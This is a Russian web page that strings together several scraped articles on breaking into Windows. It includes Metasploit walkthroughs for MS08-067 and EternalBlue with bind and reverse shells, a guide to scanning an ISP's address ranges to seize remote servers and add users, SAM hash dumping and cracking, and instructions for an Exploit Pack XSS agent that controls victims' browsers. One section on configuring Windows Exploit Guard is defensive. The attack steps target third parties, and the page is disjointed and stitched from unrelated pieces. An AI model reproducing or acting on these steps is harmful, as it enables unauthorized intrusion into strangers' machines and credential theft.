83 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Взлом Windows: пример простого эксплойта

Взлом Windows: пример простого эксплойта

В статье описывается самый простой способ того, как хакер проводит взлом Windows XP SP2 при помощи старенького эксплойта ms08_067_netapi . Эта статья – яркий пример того, насколько беззащитным может оказаться любой из пользователей, использующий устаревшие версии ОС. Но читаем до конца.

ВВОДНЫЕ

Было время, когда кроме наипопулярнейшей Windows XP не было никакой альтернативы даже среди бесплатных операционных систем. Сама Microsoft была настолько довольна сложившейся ситуацией, что развивала систему только в сторону увеличения количества сервис-паков для популярной ОС-и. Многие тогда стремились обновить ПО своих машин, избавляясь от откровенно некачественного Windows ME. И делать это часто приходилось в ущерб собственной безопасности и внешнему виду новенькой системы.

Многочисленные советы по ускорению Windows включали в себя в том числе и отключение “бесполезного” встроенного брандмауэра Windows XP, который по заверениям “продвинутых” бесполезен настолько, что его отключение пройдёт для всех пользователей абсолютно незаметно. Сейчас будет показано как хакер проникает в удалённый компьютером даже с включённым ферволлом.

Взлом Windows. Чем будем пользоваться?

  • ОС Кали Линукс 2016.2 (хозяйка)
  • виртуальная платформа VirtualBox с гостевыми операционными системами семейства Windows, в числе которых…
  • ОС Windows SP2

Помимо установленного и настроенного для тестирования VirtualBox, в состав сборки Кали входит платформа Metasploit, которая на данный момент не требовала специальной настройки. Но в любом случае имейте ввиду: в архиве блока есть статья по настройке тестовой машины с обеими платформами.

В статье приведу лишь порядок операций по работе с ОС жертвы. Подробности по приводимым командам и операциям – в других статьях блога.

Процесс работы такого эксплойта прост донельзя, Метасплойт позволяет это делать практически в автоматическом режиме вплоть до запуска, скажем, шелла. Каким он будет – уже хакер решит, я же покажу работу с добычей простейшего удалённого шелла.

Взлом Windows: ищем эксплойт

В Кали запускаем оболочку Метасплойт.

Отыщем подходящий эксплойт для жертвенной Windows XP. Это можно будет сделать из метасплойта командой

Консоль вернёт весь список уязвимостей, и я упрощаю задачу, просматривая бюллетень безопасности Microsoft, отсеивая ненужные:

Для поиска уязвимости можно воспользоваться и сканером Nessus. Специальное окно программы в красивом виде представит те же уязвимости с красочным описанием критичности уязвимости. Но пока без него.

Нам нужна вот эта ( критическая уязвимость, известная аж с 2008 года и являющаяся одной из самых популярных и позволяющая хакеру исполнить произвольный код с правами System):

exploit/windows/smb/ms08_067_netapi

Но сначала посмотрим, что нужно для его исполнения. Это делает команда

и против каких систем применяется:

Подбираемся к жертве. Она в списке за номером 29 (русская локализация Windows XP SP2). Её и выбираем (я укажу чуть позже – вы увидите команду при установке удалённого IP):

Результаты команды show options показали, что для того, чтобы взлом Windows XP прошёл успешно, хакеру понадобится указать номер порта своей системы (LPORT), порт (RPORT) и IP жертвы. Как видите по рисунку Выбор эксплойта , не указан только IP адрес жертвы – RHOST. Опускаем пока пункт, откуда хакер может узнать адрес удалённой машины. Однако, если вы знакомы со статьёй Тёмная комета в Windows, вы можете составить некое представление и об этом.

Но продолжим. Запустим гостевую Windows XP и срисуем IP подопытной командой из консоли cmd

Её адрес 192.168.0.101. Это адрес и укажем в терминале метасплойт:

Проверим готовность к эксплойту ещё раз:

Взлом Windows: пэйлоуд – начинка для эксплойта

Готово. Подбираем подходящий пэйлоуд. Его мы прилепим к нашему эксплойту (если вы наберёте следующую команду, увидите список команд и кодов, которые можно “сработать” на компьютере жертвы):

Конечно, я выберу:

windows/shell/bind_tcp

Добавлю к эксплойту:

Снова проверяем настройки эксплойта:

Атака пойдёт на компьютер с IP адресом 192.168.0.101 с порта 4444.

Если всё удачно, а помешать нам мог только правильно сконфигурированный брандмауэр, Кали установит связь с удалённым компьютером под управлением Windows.

Так… Кракозябры в текущем сеансе уберём через настройки терминала Кали. Нажмите в меню Терминал – Установить кодировку символов – Кириллица (российская) (CP 866).

Взлом Windows. Хакер – хозяин вашего компьютера

Посмотрим список директорий жертвы через dir (впрочем, чего мы там не знаем-то…). Залезем в корневой каталог:

Посмотрим состав папки той же командой dir. Если кто не понял, теперь хакер может принести жертве массу неприятностей. Ну, тем, кто хоть раз самолично в Windows работал с файлами из командной строки, объяснять дальше нечего. Я же приведу самый простой пример. Создам в Windows папку с очень важными для меня документами:

А хакер её тоже видит:

Так что, всё пропало? Меня уже взламывали, и не раз?

Да, после всего, что написано, трудно поверить – но ВРЯД ЛИ. Несмотря на всю кажущуюся безотказность этого способа, ошибка STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0) не даст покоя хакеру. Дело не в установленном брандмауэре и даже не в антивирусной программе, которая, к сожалению для пользователя часто НИКАК не может помешать подобного рода атакам на этапе этого эксплойта. Ведь антивирус метерпретер не способен заблокировать: его действие, если не ошибаюсь, основано на условии, что начинается хоть малейшее обращение к железу.

Я не специалист, но мною пробовалось, огромное количество вариантов и по большей части на “живых” машинах. Что я точно уяснил по поводу проблемы – вопрос не в языковой локали Windows, не в принадлежности вашего процессора к NX или No-NX конфигурации. Причиной ошибки STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0) является сам эксплойт – он выводит из строя службы к которым обращается. Налицо проблемы с SMB-протоколом. Перезагрузка ОС со стороны жертвы может решить проблему (И ЧТО НЕ ФАКТ), но это уже не серьёзно. Ждать, что жертва будет сидеть на непропатченной Windows не серьёзно также. “Вечно” открытый порт 445 не даёт никакой гарантии, что через него взломщик установит соединение. Повторюсь, ошибка появлялась на тех же машинах, что вчера с лёгкостью светили дырами. И никаких обновлений, никаких пакетов Internet Security и даже сторонних фаерволлов. Единственный факт, за который мне удавалось зацепиться – запуск Windows, запуск отключённого в предыдущем сеансе встроенного фаерволла и сразу его отключение. Но это – не нормальное поведение и смахивает на танцы с бубном.

Угнать за 60 секунд: Метод добычи удаленного дедика под управлением Windows

Содержание статьи

Считается, что с каждой новой версией Windows становится все защищеннее и защищеннее. Даже специалисты АНБ США приложили свою тяжелую руку к улучшению безопасности винды. Но так ли хорошо защищена ОС Windows в действительности? Давай проверим вместе. На практике!

Готовим операционную

Сейчас я покажу тебе метод добычи удаленного дедика под управлением Windows средствами Metasploit Framework с использованием уязвимости MS08-067. Почему-то эксплуатация этого бага в настоящее время пользуется большой популярностью среди хакеров Ближнего Востока и Северной Африки, о чем свидетельствуют многочисленные записи и обсуждения в Facebook (facebook.com/#!/group.php?gid=73074814856), хотя на страницах ВКонтакте, посвященных тому же самому MSF (vk.com/club16499787), царит полная тишина. В большинстве случаев уязвимыми являются все системы, работающие под управлением Windows XP Professional SP2 и SP3 (полный список операционок, подверженных риску, ты можешь найти на kb.cert.org/vuls/id/827267). Но как я понял из написанного, все программные продукты мелкомягких могут быть скомпрометированы путем эксплуатации данного бага и по сей день.

Перейдем к делу — качаем последний релиз Metasploit Framework на официальном сайте metasploit.com (или ищем на диске). Перед его установкой на компьютере отключаем антивирус. В комплект Metasploit Framework включен свой собственный сетевой сканер портов, хотя для поиска подключенных к сети машин под управлением ОС Windows мы можем использовать и внешний сканер nmap, который также добавлен в дистрибутив и устанавливается одновременно с Metasploit Framework. Итак, запускаем сканер nmap, отметив порт 445, поскольку именно он нам и нужен для дальнейшей эксплуатации уязвимости службы сервера. А что, собственно, мы будем сканировать? Ответ достаточно прост — например, можно взять и просканировать IP-префиксы своего провайдера, которые мы с легкостью узнаем на сайте bgp.he.net в разделе «Prefixes IP v4».

Читать еще:  Почему компьютер работает медленно?

Для использования полученных префиксов в сканере nmap, необходимо их предварительно скопировать в файл — например, my_isp.txt, и поместить файл в рабочий каталог с nmap. Итак, поехали, команда запуска сканера будет выглядеть следующим образом:

nmap -T4 -A -v -PE -PS445 -PA445 -iL my_isp.txt

Отлично, в результате сканирования мы получили список хостов с запущенной службой сервера, которую видно из внешней сети, причем она ничем не прикрыта, хотя мелкомягкие еще в 2008 году настоятельно рекомендовали блокировать доступ из интернета к этому сервису. Интересно, что по каждому хосту nmap выдает подробную информацию о типе установленной ОС.

Виды shell: полезная нагрузка meterpreter и другие

В настоящее время считается, что полнофункциональный Meterpreter (МР) существует только под Windows, но на самом деле это не совсем так. Существует еще несколько версий MP, реализованных на PHP и JAVA. Впрочем, ты и сам можешь стать автором «полезной нагрузки» — например, скомпилировать TCL-сценарий shell-кода для Cisco IOS с помощью утилиты tclpro.exe и в дальнейшем использовать его для жестоких игр с железными кошками. Как так? Сам не понимаю :).

Стандартную полезную нагрузку MP можно использовать почти со всеми Windows-эксплойтами, включенными в Metasploit Framework, выбрав одну из следующих полезных нагрузок:

Кратко поясню суть каждой.

  1. bind_meterpreter— резервирует порт на целевой машине и ожидает соединения. После установления соединения происходит загрузка Meterpreter’a на целевой хост, текущее соединение продолжает использоваться для связи с удаленной машиной.
  2. reverse_meterpreter— сама соединяется с предварительно заданным хостом по указанному порту для дальнейшей загрузки Meterpreter’a. Затем установленное соединение используется для связи с удаленной машиной. Все хорошо, но для успешной реализации данного метода нам понадобится реальный IP-адрес (или устанавливай проброс нужных тебе портов через NAT).
  3. find_tag— осуществляет поиск дескриптора службы, обработанной эксплойтом, и использует его для загрузки Meterpreter’a на удаленную машину, после чего существующее соединение будет использовано для связи с ней. Этот вид полезной нагрузки является особенно интересным, поскольку тут не требуется открывать новое соединение — таким образом, существует возможность обхода практически любых конфигураций брандмауэров.
  4. bind_tcp— это обычный командный интерпретатор типа cmd.exe, естественно, без всяких дополнительных наворотов, как у Meterpreter`a. Он просто резервирует порт на целевой машине и загружает стандартную оболочку.

В зависимости от цели исследования системы может быть использована любая из этих полезных нагрузок. Так чего же мы ждем? Выбираем цель из списка, полученного в результате сканирования nmap, и подключаемся к ней. Для простоты эксперимента будем использовать простой командный интерпретатор в качестве полезной нагрузки.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit> set PAYLOAD windows/vncinject/bind_tcp
PAYLOAD => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit

Если уязвимость на удаленной машине существует, то мы получим доступ к шеллу (cmd.exe) этого компьютера, и в окне появится сообщение о том, что сессия успешно установлена. В случае, когда msf определил ОС как Windows 7, можно попробовать использовать 64-разрядные полезные нагрузки, которые имеются в соответствующем разделе (ищем через меню GUI), или вызвать нагрузку через консоль. Пример работы эксплойта с полезной нагрузкой можно посмотреть на видео (ищи ролик на нашем диске).

Захват сервера

Теперь из списка хостов, сгенерированных nmap, выберем IP-адрес под управлением ОС Windows 2003 Server — это и будет наша искомая цель (ведь ты, как настоящий сетевой гуру, хотя бы раз в жизни должен поиметь свой собственный дедик!). Для работы с сервером будем использовать все тот же эксплойт (exploit/windows/smb/ms08_067_netapi) и полезную нагрузку bind_meterpreter. В результате мы получаем доступ к командной оболочке через Meterpreter, после чего добавляем нового пользователя с помощью сценария token_adduser, предварительно повысив свои привилегии на удаленной машине до уровня SYSTEM с помощью команды use priv. Ну вот — у нас есть дедик, к которому ты можешь подключаться, используя удаленный рабочий стол. На нем мы можем установить прокси-сервер, FTP и многоемногое другое. В ходе эксперимента у меня получилось набрать пять дедиков примерно в течение часа. Я думаю, это круто!

Заключение

Если кто-то хочет просто жать на кнопку «exploit», чтобы Metasploit сразу выдавал готовые дедики, то скажу сразу — этого не будет: метод все равно требует времени и терпения. Уязвимость далеко не нова, и производители ПО уже приняли меры по ее локализации.

Так, если на удаленной машине установлен антивирус или правильно сконфигурирован центр обеспечения безопасности Windows, то скорее всего доступ к порту 445 из внешней сети получить просто не удастся. В частности, антивирус Касперского отреагирует на изменение системных файлов, своевременно информируя об этом пользователя. Хотя атака из локальной сети, скорее всего, приведет к тому, что система будет полностью скомпрометирована. Несмотря ни на что, все еще остается довольно широкое поле для экспериментов с безопасностью Windows, и ты можешь внести свой вклад в это дело. Непоправимый вклад :).

History

23 октября 2008 года Microsoft выпускает «Бюллетень по безопасности MS08-067». Речь шла об уязвимости в службе сервера, которая делает возможным удаленное выполнение произвольного кода (958644). Успешная эксплуатация этой уязвимости может позволить хакерам скомпрометировать целевую систему под управлением ОС Windows. Да что тут говорить, уязвимость MS08-067 активно используется взломщиками и в настоящее время. Самым известным червем, использующим эту уязвимость, является Conficker/Downadup в различных его модификациях.

Компания Microsoft в свое время даже объявляла премию в размере $250 000 за информацию, которая будет способствовать поимке создателя этого червячка. «Но ведь это далекое прошлое!», — возразишь ты и будешь отчасти прав. Но только отчасти, так как сегодня ситуация не сильно изменилась.

Авторская статья [Eternalblue]ВзЛоМ Windows с Android.

Перейти к странице

SergoProxy

Всем привет , сегодня мы с вами разберем ВзЛоМ windows 7 через эксплоит под названием – eternalblue. С помощью этого эксплоита злоумышленник может получить удаленный доступ к жертве и уже управлять ее машиной (ПК).
Впервые использование этого эксплойта было 21 апреля 2017 года, программа – DoublePulsar. А 12 мая 2017 года появилась всеми нами знакомая WannaCry(шифровальщик) , которая использовала эксплойт eternalblue , и которая заставила Microsoft выпустить обновления на неподдерживаемые ОС.​

Итак , теперь приступим к тестированию на безопасность:

Атакующая ОС – Android (Termux)
Жертва – Windows 7 (64бит)

Если у кого нет metasploit в termux , его установка :

Metasploit – это платформа для создания и использования эксплойтов. Был создан в 2003 году.
Эксплойт – программа или же фрагмент кода , использующий какую-либо уязвимость для проведения атак.

1.Заходим в termux и открываем metasploit :
msfconsole

2.Выбираем эксплойт etermalblue:
use exploit/windows/smb/ms17_010_eternalblue

Для windows 8 :
use exploit/windows/smb/ms17_010_eternalblue_win8

3.Выбираем процесс , который будем внедрять в систему :
Для 32 бит :

set process inject wlms.exe

Для 64 бит:
set process inject lsass.exe

4.Выбираем с помощью чего мы будем управлять компьютером :
set payload windows/x64/meterpreter/reverse_tcp

Читать еще:  Как легко разбить жесткий диск на разделы в Windows 7/10

5.Прописываем Ip жертвы (вместо 192.168.1.6 пишите ip жертвы):
set rhost 192.168.1.6

6.Пишем свой IP :
set lhost 192.168.1.5

7.Ну а теперь осталось прописать одну команду под названием :
exploit

Пример:

А теперь вы можете делать всё , что захотите, список команд можно просмотреть командой help , и теперь как-же обезопасится от этого? Ну для начала, хотя-бы проверить ваш пк на обновления , и установить самое последнее.Ну и иметь установленный антивирус. Спасибо за внимание, надеюсь вам понравилась статья)

Как настроить Защиту от эксплойтов в Windows 10

Exploit Guard- новая функция безопасности Защитника Windows, которая была впервые представлена Microsoft в Windows 10 Fall Creators Update.

Защита от эксплойтов представляет собой интегрированную версию инструмента Microsoft EMET (Enhanced Mitigation Experience Toolkit), поддержка которого завершится в середине 2018 года.

Защита от использования уязвимостей включена по умолчанию, если активен Защитник Windows. Эта функция является единственной функцией Exploit Guard, которая не требует включения защиты в режиме реального времени.

Данную функцию можно настроить в Центре безопасности Защитника Windows, с помощью групповых политик или команд PowerShell.

Центр безопасности Защитника Windows

Пользователи Windows 10 могут настроить защиту от эксплойтов в Центре безопасности Защитника Windows.

  1. Используйте сочетание клавиша Windows + I для запуска приложения “Параметры”.
  2. Перейдите в “Обновление и безопасность”, затем выберите пункт “Защитник Windows”.
  3. Нажмите кнопку Открыть Центр безопасности Защитника Windows.
  4. Выберите панель “Управление приложениями и браузером”.
  5. На открывшейся странице выберите ссылку Параметры защиту от эксплойтов.

Все настройки разделены на две категории: Системные параметры и Параметры программ.

На вкладке Системные параметры выводится список всех доступных механизмов защиту с их статусом. В Windows 10 Fall Creators Update доступны следующие защиты:

  • Защита потока управления (CFG) – вкл. по умолчанию.
  • Предотвращение выполнения данных (DEP) – вкл. по умолчанию.
  • Принудительное случайное распределение для образов (обязательный ASLR) – выкл. по умолчанию.
  • Случайное распределение выделения памяти (низкий ASLR) – вкл. по умолчанию.
  • Проверить цепочки исключений (SEHOP) – вкл. по умолчанию.
  • Проверка целостности кучи – вкл. по умолчанию.

Параметры программ дают вам возможность настраивать защиту для отдельных программ и приложений. Данная опция работает аналогично функции исключений в Microsoft EMET для определенных программ. Данная возможность будет особо полезной, если программа ошибочно работает, когда включены определенные защитные модули.

По умолчанию несколько программ добавлены в исключения, в частности svchost.exe, spools.exe, runtimebroker.exe, iexplore.exe и другие основные программы Windows. Обратите внимание, что вы можете переопределить эти исключения, выбрав файлы и нажав кнопку “Редактировать”.

Нажмите ссылку “Добавление программы для индивидуальной настройки”, чтобы добавить приложение в список исключений.

Вы можете установить отдельный статус всех поддерживаемых защит для каждой программы, которую вы добавили в настройках программы. Помимо переопределения системного параметра по умолчанию и принудительного его включения или отключения, существует также возможность установить параметр только для аудита. В последнем случае будет происходить запись событий, которые происходили, если бы статус защиты был включен, в системный журнал Windows.

В списке “Параметры программ” перечислены дополнительные параметры защиты, которые невозможно настроить под системными параметрами, поскольку они настроены для работы только на уровне приложения.

  • Защита от произвольного кода (ACG)
  • Блокировка образов низкой целостности
  • Блокировка удаленных образов
  • Блокировка ненадежных шрифтов
  • Защита целостности кода
  • Отключение точек расширения
  • Отключение вызовов системы Win32k
  • Не разрешать дочерние процессы
  • Фильтрация адресов экспорта (EAF)
  • Фильтрация адресов импорта (IAF)
  • Имитация выполнения (SimExec)
  • Проверка вызовов API (CallerCheck)
  • Проверка использования дескриптора
  • Проверка целостности зависимостей образа
  • Проверка целостности стека (StackPivot)

PowerShell

Вы можете использовать командную строку PowerShell для установки, удаления или изменения списка мер. Доступны следующие команды:

Чтобы просмотреть все защитные меры указанного процесса: Get-ProcessMitigation -Name processName.exe

Чтобы установить защитную меру: Set-ProcessMitigation – – , ,

Область действия: -System или -Name .

Действие: либо -Enable или -Disable .

Мера: название защитной меры. Обратитесь к таблице на сайте Microsoft, чтобы посмотреть список доступных мер. Вы можете отделить несколько мер запятой.

  • Set-Processmitigation -System -Enable DEP
  • Set-Processmitigation -Name test.exe -Remove -Disable DEP
  • Set-ProcessMitigation -Name processName.exe -Enable EnableExportAddressFilterPlus -EAFModules dllName1.dll, dllName2.dll

Импорт и экспорт конфигураций

Конфигурации можно импортировать и экспортировать. Данные операции можно сделать на странице “Параметров защиты эксплойтов” в Центре безопасности Защитника Windows, а также с помощью PowerShell или редактора групповых политик.

Кроме того, конфигурации EMET можно преобразовать для последующего импорта.

Использование настроек защиты от эксплойтов

Вы можете экспортировать конфигурации в приложении “Центр безопасности Защитника Windows”, но не импортировать их. Экспорт добавляет все меры уровня системы и уровня приложения.

Нажмите ссылку “Параметры экспорта” и выберите местоположение для файла .XML с настройками.

Использование PowerShell для экспорта файла конфигурации

  1. Откройте Powershell с правами администратора устройства.
  2. Запустите команду: Get-ProcessMitigation -RegistryConfigFilePath filename.xml

Измените путь и filename.xml, указав требуемое местоположение и название файла.

Использование PowerShell для импорта файла конфигурации

  1. Откройте Powershell с правами администратора устройства.
  2. Запустите команду: Set-ProcessMitigation -PolicyFilePath filename.xml

Использование групповых политик для установки файла конфигурации

Вы можете установить файлы конфигураций с помощью редактора групповых политик:

Взлом Windows: пример простого эксплойта

Давайте сегодня поговорим про взлом Windows XP SP3. Не думайте, что тема про взлом Windows XP уже не актуальна! Еще как актуальна, до сих пор доля на рынке операционных систем Windows XP занимает лидирующие позиции, что позволяет использовать многочисленные эксплоиты. Я остановился на популярном эксплоите MS08_067, о котором вы можете прочитать здесь. Про статистику и долю на рынке ОС вы можете прочитать здесь или воспользуйтесь поиском.

Для начала обновим Metasploit:

  • rhost – IP-адрес удаленного пользователя (remote host)
  • rport – порт удаленного пользователя (remote port)
  • lhost – IP-адрес атакующего (local host)
  • lport – порт атакующего (local port)

Проверяем все ли опции заданы:

Убеждаемся, что все в порядке.

Теперь запускаем эксплоит:

Отлично! Мы в системе.

Посмотрим, какими правами мы обладаем, но скорее всего у нас будут права SYSTEM:

Иногда бывает, что у атакующего не хватает прав на совершение какого то действия, т.е. он работает под ограниченной учетной записью. И соответственно вылетают такие ошибки, как:

Мы можем попробовать поднять наши права в системе командой getsystem:

Это было небольшое отступление, идем дальше.

Хорошо, теперь можем делать все что вздумается, но так как мы говорим про удаленный взлом пароля Windows XP, то будем придерживаться плана.

Сейчас нам нужно вывести содержимое базы данных SAM. Для этого воспользуемся командой hashdump:

Чтобы расшифровать хэшы можно воспользоваться многочисленными онлайн сервисами, например cmd5.ru. Но я решил убить двух зайцев сразу, поэтому сейчас покажу вам, как это сделать с помощью программы ophcrack.

Теперь нам необходимо скачать rainbow tables к ней, поэтому переходим по этой ссылке и скачиваем архив под названием “XP free small (380MB)“. Для наших экспериментов понадобится только он, но вы можете скачать все, дело ваше. Сохраняем архив с rainbow tables в систему, потом извлекаем. Как разархивировать zip архив в Linux можно прочитать здесь.

Переходим в ophcrack и нажимаем кнопку Tables. В появившемся окне выбираем XP free small, потом нажимаем Install и выбираем директорию с rainbow таблицами. Я разархивировал их в /root/tables/.

Когда rainbow таблицы выбраны, нажимаем на кнопку Load и выбираем пункт Single hash. Перед вами появится окно (см. рисунок ниже), в котором вводим интересующую вас строку вывода команды hashdump. Я выбрал вот эти строки:

  • Admin:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7e aee8fb117ad06bdd830b7586c.
  • Hub-lex:1004:44efce164ab921caaad3b435b51404ee:32ed87bd b5fdc5e9cba88547376818d4.
Читать еще:  Обновить хром для виндовс 10 64 бит. Условия предоставления услуг Google Chrome. Предоставление Услуг компанией Google

Нажимаем кнопку OK.

Осталось щелкнуть по кнопке Crack и пароли будут получены.

Вот и все! Как всегда ничего сложного. Дальше будет еще интереснее, поэтому оформляйте подписку по E-MAIL или RSS, чтобы следить за выходом новых статей.

Взлом Windows: пример простого эксплойта

Exploit Pack – это интегрированная среда для проведения тестирования на проникновение. В статье рассмотрены настройки платформы и примеры использования.

Инструкция по установке
Exploit Pack предустановлен в некоторых дистрибутивах linux. Рекомендовано использование Black Arch.

Требования к любой операционной системе довольно простые: Java 8 SDK и Nmap.

Загрузите Java 8 SDK напрямую с официального веб-сайта. Следующим шагом будет установка Nmap на ваш компьютер. Актуальную версию возможно получить с сайта Nmap.org:

Теперь скачаем свежую версию Exploit Pack напрямую из репозитория на GitHub.

Разархивировав, запустите файл ExploitPack.jar. Это также возможно сделать и через консоль.

java -jar ExploitPack.jar

WINDOWS

1)Загрузите и установите Java 8 от Oracle: в зависимости от платформы ОС вам необходимо выбрать Windows Java SE Java 8 для 32 бит или Java 8 для 64 бит.

2)После скачайте Exploit Pack с официального сайта, распакуйте его и запустите ExplotPack.jar. Если это не работает, попробуйте запустить через консоль, используя команду:
java -jar ExploitPack.jar
GNU / Linux:

1)Любой дистрибутив Linux, который поддерживает пакеты DEB(Ubuntu, Debian, Kali и т. д.),
2)Установка Java 8 из репозитория Oracle.

Выполните в терминале следующие команды:
echo “deb http://ppa.launchpad.net/webupd8team/java/ubuntu trusty main” >> /etc/apt/sources.list
echo “deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu precise main” >> /etc/apt/sources.list
sudo apt-key adv –keyserver keyserver.ubuntu.com –recv-keys EEA14886
sudo apt-get update
sudo apt-get install oracle-java8-installer
После установки java запустите ExplotPack.jar или выполните команду в терминале

java -jar ExploitPack.jar
Mac OS X:

Загрузите и установите Java 8 для OSX 32/64 бит из Oracle: OSX Java 8 32/64 бит
Распакуйте и дважды щелкните ExploitPack.jar, чтобы запустить его, или через консоль:

java -jar ExploitPack.jar

Образ для VMWare с предустановленным Exploit Pack:https://defcon.ru/wp-admin/post-new.php#

VMWare — Kali Linux 2.0 + Exploit Pack ( User: root / Pass: exploitpack )
MD5: 260bd5b4c6c3d88b8df6c4375c8b6ea5 — Download this VM

Exploit Pack — это Java-приложение. Вы можете загрузить бесплатную версию с сайта ExploitPack.com. Для продвинутых пользователей существуют расширенные версии пакетов.

Что такое пакеты?
Пакеты — это набор эксплойтов в зашифрованном виде (подписанный файл gzip) содержащий модули, которые подключаются непосредственно к самой программе Exploit Pack.
Professional pack: этот пакет содержит более 10000+ эксплойтов.
Включает в себя: Windows, Linux, Unix, Minix, SCO, Solaris, OSX и т. Д. И даже мобильные и веб-атаки.
Premium Pack + Zero Days,
Это более 37 000+ эксплойтов, постоянные обновления и техническая поддержка.
Это расширенный вариант Professional Pack, но включает в себя обновления с 0-day и еженедельными/ежемесячными обновлениями + техническую поддержку.

Первые шаги с использованием пакета Exploit Pack
1. Интерпретатор: определить какой интерпретатор использовать по-умолчанию.
Рекомендуется использовать Python.
Возможно использование Ruby, Perl, Bash, Powershell или многие другие..
2. Параметры Nmap: Настройка полного пути к Nmap, следует указать желаемые параметры, которые вы хотите использовать в Exploit Pack (эти опции будут использоваться при запуске модуля «Scanner»).
3. После всех настрое нажмите «Check», чтобы проверить, правильность настроек.
4. Последний шаг это перезапуск Exploit Pack, чтобы изменения вступили в силу.

Вкладка «Exploits» и поиск модуля
Эта вкладка позволяет выбрать платформу. Если вы используете версию с открытым исходным кодом без пакета, то у вас будет небольшое количество эксплойтов около 400 + модулей, есть также встроенный редактор, который вы можете использовать для включения ваших собственных или импорта сторонних модулей.
Используйте окно поиска для фильтрации по имени, платформе, службе, cve или любым данным, доступным в настройках модуля эксплойта. Существует также фильтр с некоторыми базовыми условиями, вы можете смешать их с вашим собственным текстовым поиском.
Свойства
Это те свойства, которые вы должны настроить для эксплойта перед его исполнением, некоторые из них будут заселены непосредственно из предпочтений. Присутствует возможность изменить их на нужный, затем нажмите «Save».

Работа со сканером

Nmap («Network Mapper») — это инструмент с открытым исходным кодом для исследования сети. И аудит безопасности. Он был разработан для быстрого сканирования больших сетей,
Выберите вкладки Auxiliary=>Scanner=>Nmap-Scanner. После этого в середине экрана введите IP-адрес или имя хоста, которое вы хотите сканировать, используя Nmap.Когда все будет готово, нажмите кнопку «Execute Auxiliary», и ожидайте результатов сканирования. Скорость зависит от параметров Nmap, а также от скорости вашего интернета.

Если сканирование было выполнено правильно на экране вы можете видеть открытые порты. Нажмите «Tagerts», чтобы получить полные данные.

Встроенный редактор Exploit Pack
Редактор существует для того, что бы помогать разрабатывать или модифицировать эксплойт-код «на лету» на любом языке программирования с встроенной проверкой синтаксиса, авто дополнением а так же с возможностью добавления шелл кодов. Vi, Emacs, Notepad ++ могут работать в связке с Exploit Pack, для редактирования кода напрямую.

Вывод будет отображаться в «Debug Console».

Отчетность
Exploit Pack записывает все выполненные вами действия. Во вкладке «Report Wizard» вы можете создать отчет о результатах работы.

XSS
Exploit Pack включает в себя как часть основных функций XSS Channel.
На техническом уровне это тип приложения AJAX, который может получать команды, отправлять ответы.
Командная консоль XSS — это инструмент, который можно использовать для настройки XSS-канала между жертвой и злоумышленником, чтобы злоумышленник мог управлять браузером жертвы, отправив ему произвольные команды.
Это сообщение двунаправленно. Чтобы заставить XSS Shell работать, злоумышленнику необходимо внедрить JavaScript XSS Shell. Затем злоумышленник может управлять браузером жертвы и как результат может видеть запросы.
Пример инъекции :

Как это работает:

Во-первых, часть серверной части координирует XSS Shell между атакующим и жертвой. Это приложение на стороне сервера и требует использования пакета Exploit Pack в качестве хранилища.
Вторая часть инструмента — клиентская часть и написана на JavaScript. Загружается в браузере жертвы и отвечает за прием и обработку команд вместе с предоставлением канала между жертвой и злоумышленником.
Заключительная часть оболочки XSS — интерфейс администрирования. Злоумышленник может отправлять новые команды и получать ответы от нескольких браузеров жертв.

Где находится пакет Exploit?
Нажмите на Auxiliary и перейдите к Remote Control, выберите Agent-XSS, вы увидите в окне редактора реальный код, который будет запущен непосредственно в браузер жертвы один раз срабатывает. Измените значение в коде с » http://127.0.0.1:8000/agent/;» на IP-адрес, который вы хотите использовать.
Как провести атаку?
1. Выберите и скопируйте файл в файл «exploitpack.js» и разместите его на нужном веб-сайте.
2. Разместите этот файл на веб-сервере по вашему выбору или обслуживайте его с помощью пакета Exploit Pack.
3. Теперь активируйте жертву для выполнения этой JS через инъекцию XSS или путем изменения целевого веб-сайта.

После того, как жертва выполнила этот JS, вы увидите в списке соединений новых агентов, появится список полезных команд, которые вы можете использовать с любым из этих агентов.

Подытожим.
Exploit Pack – это интегрированная среда для выполнения и проведения профессиональных тестов на проникновение. Как любой инструмент такого типа, он требует некоторых базовых знаний и опыта, Exploit Pack был разработан для использования практическими специалистами в области безопасности для поддержки их процесса тестирования.
Все что требуется для полноценной работы немного усилий и каждый может начать использовать основные функции Exploit Pack для глубокой проверки безопасности своих приложений.

голоса
Рейтинг статьи
Ссылка на основную публикацию
Статьи c упоминанием слов: